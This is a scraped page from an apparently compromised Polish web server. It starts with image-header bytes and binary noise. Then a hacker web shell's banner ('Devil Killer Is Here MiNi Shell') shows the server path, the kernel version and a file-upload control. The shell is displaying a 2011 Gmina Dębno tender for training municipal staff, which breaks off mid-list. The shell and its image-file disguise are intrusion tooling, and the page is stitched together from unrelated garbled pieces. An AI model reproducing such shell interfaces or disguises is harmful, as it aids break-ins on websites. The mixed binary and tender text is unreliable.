JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110321/90381-N-2011.html

<p class="kh_header"><b>Dębno: ORGANIZACJA 4 BLOKÓW SZKOLENIOWYCH DLA PRACOWNIKÓW 11 JST W RAMACH PROJEKTU pn. Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością</b><br>
<b>Numer ogłoszenia: 90381 - 2011; data zamieszczenia: 21.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dębno , ul. Marszałka J. Piłsudskiego 5, 74-400 Dębno, woj. zachodniopomorskie, tel. 095 7603001 do 4, faks 095 7602030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.debno.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA 4 BLOKÓW SZKOLENIOWYCH DLA PRACOWNIKÓW 11 JST W RAMACH PROJEKTU pn. Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.	Przedmiot zamówienia obejmuje zorganizowanie 4 bloków szkoleniowych (usługa szkoleniowa) dla pracowników 11 Jednostek Samorządu Terytorialnego (JST) w ramach projektu Krok w przyszłość - od biurokratycznej irracjonalności do kompleksowego zarządzania jakością współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej - zwanego dalej Projektem. W szczególności przedmiot zamówienia obejmuje:
a.	Pozyskanie trenerów,
b.	Przeprowadzenie szkoleń,
c.	Dostarczenie cateringu,
d.	Opracowanie i przekazanie materiałów szkoleniowych,
e.	Opracowanie i przeprowadzenie testów wiedzy,
f.	Opracowanie i wydanie certyfikatów ukończenia szkoleń,
g.	Sporządzanie wymaganej w siwz dokumentacji szkoleń.


Zamówienie zostało podzielone na następujące części:

1.	 Blok szkoleń z zakresu obsługi klientów
2.	 Blok szkoleń z zakresu zarządzania zasobami ludzkimi
3.	 Blok szkoleń z zakresu zarządzania przez projekty
4.	 Blok szkoleń z zakresu budżetu zadaniowego

Tematyka szkoleń dla poszczególnych części:

CZĘŚĆ 1.	Blok szkoleń z zakresu obsługi klientów
1)	Szkolenie pn. Komunikacja z klientem (2 dni szkoleniowe, max. 120 uczestników, 8 grup szkoleniowych)
2)	Szkolenie pn. Sytuacje trudne w obsłudze klienta - strategie skutecznego działania (1 dzień szkoleniowy, max. 90 uczestników, 7 grup szkoleniowych)
3)	Szkolenie pn. Rozumienie potrzeb i zachowań klienta (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
4)	Szkolenie pn. Jak postępować ze skargami i wnioskami (2 dni szkoleniowe, max. 90 uczestników, 7 grup szkoleniowych)
5)	Warsztaty pn. Styl urzędniczy - formułowanie pism (1 dzień szkoleniowy, max. 110 uczestników, 8 grup szkoleniowych)
6)	Szkolenie pn. Kryteria poprawności językowej pism urzędniczych (2 dni szkoleniowe, max. 95 uczestników, 7 grup szkoleniowych)

CZĘŚĆ 2.	Blok szkoleń z zakresu zarządzania zasobami ludzkimi
1)	Szkolenie pn. Zarządzanie zasobami ludzkimi z psychologicznego punktu widzenia (1 dzień szkoleniowy, max. 70 uczestników, 5 grup szkoleniowych)
2)	Szkolenie pn. Rekrutacja i selekcja pracowników (1 dzień szkoleniowy, max. 60 uczestników, 4 grupy szkoleniowe)
3)	Szkolenie pn. Motywowanie pracowników (1 dzień szkoleniowy, max. 65 uczestników, 4 grupy szkoleniowe)
4)	Szkolenie pn. Ocenianie pracowników (1 dzień szkoleniowy, max. 65 uczestników, 4 grupy szkoleniowe)
5)	Warsztaty pn. Proces zarządzania zasobami ludzkimi w praktyce (1 dzień szkoleniowy, max. 65 uczestników, 4 grupy szkoleniowe)

CZĘŚĆ 3.	Blok szkoleń z zakresu zarządzania przez projekty
1)	Szkolenie pn. Metodyka Project Management (4 dni szkoleniowe, max. 50 uczestników, 4 grupy szkoleniowe)
2)	Szkolenie pn. Aspekty finansowe projektu (2 dni szkoleniowe, max. 55 uczestników, 4 grupy szkoleniowe)
3)	Szkolenie pn. Komunikacja i praca zespołowa w projekcie (1 dzień szkoleniowy, max. 50 uczestników, 4 grupy szkoleniowe)
4)	Szkolenie pn. Zarządzanie ryzykiem w projekcie (2 dni szkoleniowe, max. 55 uczestników, 4 grupy szkoleniowe)
5)	Szkolenie pn. Prawne aspekty umów (1 dzień szkoleniowy, max. 55 uczestników, 4 grupy szkoleniowe)

CZĘŚĆ 4.	Blok szkoleń z zakresu budżetu zadaniowego
1)	Szkolenie pn. Budżet zadaniowy - podstawowe pojęcia (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
2)	Szkolenie pn. Mierniki wykonania zadań i stopnia realizacji (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
3)	Szkolenie pn. Wdrożenie budżetu zadaniowego (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
4)	Szkolenie pn. Zamknięcie ksiąg rachunkowych jst i jej jednostek organizacyjnych (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
5)	Szkolenie pn. Budżet zadaniowy a planowanie wieloletnie (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)
6)	Warsztaty pn. Wybrane zagadnienia praktyczne (1 dzień szkoleniowy, max. 75 uczestników, 5 grup szkoleniowych)

Szczegółowa tematyka szkoleń znajduje się w załączniku nr 7 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia dotychczasowemu wykonawcy usług zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy - Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> CZĘŚĆ 1.	Blok szkoleń z zakresu obsługi klientów - 3 000 zł
CZĘŚĆ 2.	 Blok szkoleń z zakresu zarządzania zasobami ludzkimi - 1 000 zł
CZĘŚĆ 3.	 Blok szkoleń z zakresu zarządzania przez projekty - 2 000  zł
CZĘŚĆ 4.	 Blok szkoleń z zakresu budżetu zadaniowego - 1 500 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Niezbędne wymagania dotyczące wiedzy i doświadczenia Wykonawcy:
2)	Niezbędne wymagania dotyczące wiedzy 
i doświadczenia Wykonawcy 

Dla części I zamówienia (Blok szkoleń z zakresu obsługi klientów):

a.	Wykonanie co najmniej 3 usług polegających na organizacji i przeprowadzeniu szkoleń z tematyki zbliżonej do tematyki szkoleń bloku I  (w tym co najmniej 1 usługa zbliżona tematycznie do szkoleń nr 1-3 i 1 usługa zbliżona tematycznie do szkoleń 4-6) dla sektora finansów publicznych o wartości nie mniejszej niż 150 000,00 zł brutto każda w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami).
b.	Wykazanie przeszkolenia co najmniej 300 osób (pracowników sektora finansów publicznych) z tematyki zbliżonej do tematyki szkoleń bloku I - w tym co najmniej 150 osób z tematyki szkoleń nr 1-3 oraz 150 osób z tematyki szkoleń nr 4-6, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami).

Dla części II zamówienia (Blok szkoleń z zakresu zarządzania zasobami ludzkimi):

a)	Wykonanie co najmniej 3 usług polegających na organizacji i przeprowadzeniu szkoleń z tematyki zbliżonej do tematyki szkoleń bloku II dla sektora finansów publicznych o wartości nie mniejszej niż 50 000,00 zł brutto każda w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami).
b)	Wykazanie przeszkolenia co najmniej 200 osób (pracowników sektora finansów publicznych) z tematyki zbliżonej do tematyki szkoleń bloku II, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami).

Dla części III zamówienia (Blok szkoleń z zakresu zarządzania przez projekty):

a)	Wykonanie co najmniej 3 usług polegających na organizacji i przeprowadzeniu szkoleń z tematyki zbliżonej do tematyki szkoleń bloku III dla sektora finansów publicznych o wartości nie mniejszej niż 50 000,00 zł brutto każda w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami).
b)	Wykazanie przeszkolenia co najmniej 200 osób (pracowników sektora finansów publicznych) z tematyki zbliżonej do tematyki szkoleń bloku III, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami).

Dla części IV zamówienia (Blok szkoleń z zakresu budżetu zadaniowego):

a)	Wykonanie co najmniej 3 usług polegających na organizacji i przeprowadzeniu szkoleń z tematyki zbliżonej do tematyki szkoleń bloku IV dla sektora finansów publicznych o wartości nie mniejszej niż 50 000,00 zł brutto każda w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami).
b)	Wykazanie przeszkolenia co najmniej 200 osób (pracowników sektora finansów publicznych) z tematyki zbliżonej do tematyki szkoleń bloku IV, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, poświadczone dokumentem potwierdzającym należyte wykonanie usługi (referencjami).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Wymagania dotyczące kadry merytorycznej - trenerów uczestniczących w realizacji zamówienia: 
a)	Wykonawca zapewni lub przedstawi zobowiązania podmiotu trzeciego (zgodnie z rozdziałem 8 pkt. 3) do udostępnienia na potrzeby wykonania zadania:
Dla części I zamówienia (Blok szkoleń z zakresu obsługi klientów):
 co najmniej 2 trenerów do każdego tematu szkolenia tj. łącznie do bloku nr I min. 12 trenerów. Wymagania szczegółowe:
- Szkolenie pn. Komunikacja z klientem - każdy z trenerów powinien wykazać doświadczenie zawodowe w zakresie obsługi klienta, szczególnie trudnego.
- Szkolenie pn. Sytuacje trudne w obsłudze klienta - strategie skutecznego działania - każdy z trenerów powinien wykazać doświadczenie zawodowe w zakresie obsługi klienta, szczególnie trudnego.
- Szkolenie pn. Rozumienie potrzeb i zachowań klienta - każdy z trenerów powinien wykazać doświadczenie zawodowe w zakresie obsługi klienta, szczególnie trudnego.
- Szkolenie pn. Jak postępować ze skargami i wnioskami - każdy z trenerów powinien posiadać wykształcenie prawnicze lub administracyjne oraz doświadczenie zawodowe związane z tematyką szkolenia.
- Warsztaty pn. Styl urzędniczy - formułowanie pism - każdy z trenerów powinien posiadać wykształcenie prawnicze lub administracyjne oraz doświadczenie zawodowe związane z tematyką szkolenia. 
- Szkolenie pn. Kryteria poprawności językowej pism urzędniczych - każdy z trenerów powinien posiadać wykształcenie prawnicze lub administracyjne oraz doświadczenie zawodowe związane z tematyką szkolenia.

Każdy trener przedstawiony do wykonania zadania powinien wykazać przeprowadzenie co najmniej 3 szkoleń z zakresu tematycznego zbliżonego do każdego szkolenia, które ma prowadzić w ramach realizacji zamówienia. Każdy trener powinien posiadać wykształcenie wyższe.

Dla części II zamówienia (Blok szkoleń z zakresu zarządzania zasobami ludzkimi):
 co najmniej 2 trenerów do każdego tematu szkolenia tj. łącznie do bloku nr II min. 10 trenerów;
- Szkolenie pn. Zarządzanie zasobami ludzkimi z psychologicznego punktu widzenia - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z tematyką szkolenia (zarządzanie zasobami ludzkimi).
- Szkolenie pn. Rekrutacja i selekcja pracowników - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z tematyką szkolenia (rekrutacja i selekcja pracowników).
- Szkolenie pn. Motywowanie pracowników - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z tematyką szkolenia (zarządzanie zasobami ludzkimi).
- Szkolenie pn. Ocenianie pracowników - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z tematyką szkolenia (zarządzanie zasobami ludzkimi).
- Warsztaty pn. Proces zarządzania zasobami ludzkimi w praktyce - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z tematyką szkolenia (zarządzanie zasobami ludzkimi).
Każdy trener przedstawiony do wykonania zadania powinien wykazać przeprowadzenie co najmniej 3 szkoleń z zakresu tematycznego zbliżonego do każdego szkolenia, które ma prowadzić w ramach realizacji zamówienia. Każdy trener powinien posiadać wykształcenie wyższe.

Dla części III zamówienia (Blok szkoleń z zakresu zarządzania przez projekty):
	 co najmniej 2 trenerów do każdego tematu szkolenia tj. łącznie do bloku nr III min. 10 trenerów;
- Szkolenie pn. Metodyka Project Management - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z zarządzaniem projektami lub poświadczenie kwalifikacji uprawniających do prowadzenia szkoleń z ww. tematyki.
- Szkolenie pn. Aspekty finansowe projektu - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z przygotowywaniem i zarządzaniem projektami współfinansowanymi ze środków UE.
- Szkolenie pn. Komunikacja i praca zespołowa w projekcie - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z tematyką szkolenia.
- Szkolenie pn. Zarządzanie ryzykiem w projekcie - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z zarządzaniem projektami.
- Szkolenie pn. Prawne aspekty umów - każdy z trenerów powinien posiadać wykształcenie prawnicze oraz doświadczenie zawodowe związane z tematyką szkolenia.

Każdy trener przedstawiony do wykonania zadania powinien wykazać przeprowadzenie co najmniej 3 szkoleń z zakresu tematycznego zbliżonego do każdego szkolenia, które ma prowadzić w ramach realizacji zamówienia. Każdy trener powinien posiadać wykształcenie wyższe.


Dla części IV zamówienia (Blok szkoleń z zakresu budżetu zadaniowego):
	co najmniej 2 trenerów do każdego tematu szkolenia tj. łącznie do bloku nr IV min. 12 trenerów;
- Szkolenie pn. Budżet zadaniowy - podstawowe pojęcia - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z przygotowywaniem, wdrażaniem i realizacją budżetu zadaniowego.
- Szkolenie pn. Mierniki wykonania zadań i stopnia realizacji - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z przygotowywaniem, wdrażaniem i realizacją budżetu zadaniowego.
- Szkolenie pn. Wdrożenie budżetu zadaniowego - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z przygotowywaniem, wdrażaniem i realizacją budżetu zadaniowego.
- Szkolenie pn. Zamknięcie ksiąg rachunkowych jst i jej jednostek organizacyjnych - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z przygotowywaniem, wdrażaniem i realizacją budżetu zadaniowego.
- Szkolenie pn. Budżet zadaniowy a planowanie wieloletnie - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z przygotowywaniem, wdrażaniem i realizacją budżetu zadaniowego.
- Warsztaty pn. Wybrane zagadnienia praktyczne - każdy z trenerów powinien wykazać doświadczenie zawodowe związane z przygotowywaniem, wdrażaniem i realizacją budżetu zadaniowego.

Każdy trener przedstawiony do wykonania zadania powinien wykazać przeprowadzenie co najmniej 3 szkoleń z zakresu tematycznego zbliżonego do każdego szkolenia, które ma prowadzić w ramach realizacji zamówienia. Każdy trener powinien posiadać wykształcenie wyższe.

a1) Dla wszystkich część zamówienia: Zaleca się dołączenie do wykazu trenerów CV każdej wskazanej osoby z uwzględnieniem informacji na temat wykształcenia, kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia.

Zamawiający zaznacza, iż na etapie realizacji jeden trener może prowadzić kilka różnych tematów szkoleń, o ile spełnia wymagania określone w siwz dla każdego szkolenia.

Ocena spełnienia ww warunków dokonana zostanie zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w pkt. 9 Specyfikacji Istotnych Warunków Zamówienia. Z treści załączonych dokumentów musi jednoznacznie wynikać, że ww warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, dowód wniesienia wadium, oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - liczba wykonanych usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a.	zmiany osób wskazanych do realizacji zamówienia - w przypadku nieprzewidzianych zdarzeń losowych, takich jak: śmierć, choroba, ustanie stosunku pracy, niewywiązywania się z obowiązków wynikających z umowy, pod warunkiem, że osoby zaproponowane na ich miejsce będą posiadały kwalifikacje i uprawnienia zgodne z wymogami zawartymi w SIWZ oraz pod warunkiem złożenia pisemnego uzasadnienia zmiany przez Wykonawcę,
b.	zmiany terminu wykonania umowy - w przypadku zaistnienia obiektywnych, nieprzewidzianych przeszkód uniemożliwiających planowe wykonywanie umowy, w szczególności zmiany harmonogramu realizacji projektu,
c.	zmiany tematyki szczegółowej szkoleń - jeżeli Zamawiający poweźmie informację, iż inna tematyka szczegółowa szkoleń wpłynie na skuteczniejsze osiągnięcie celów dydaktycznych i rezultatów projektu,
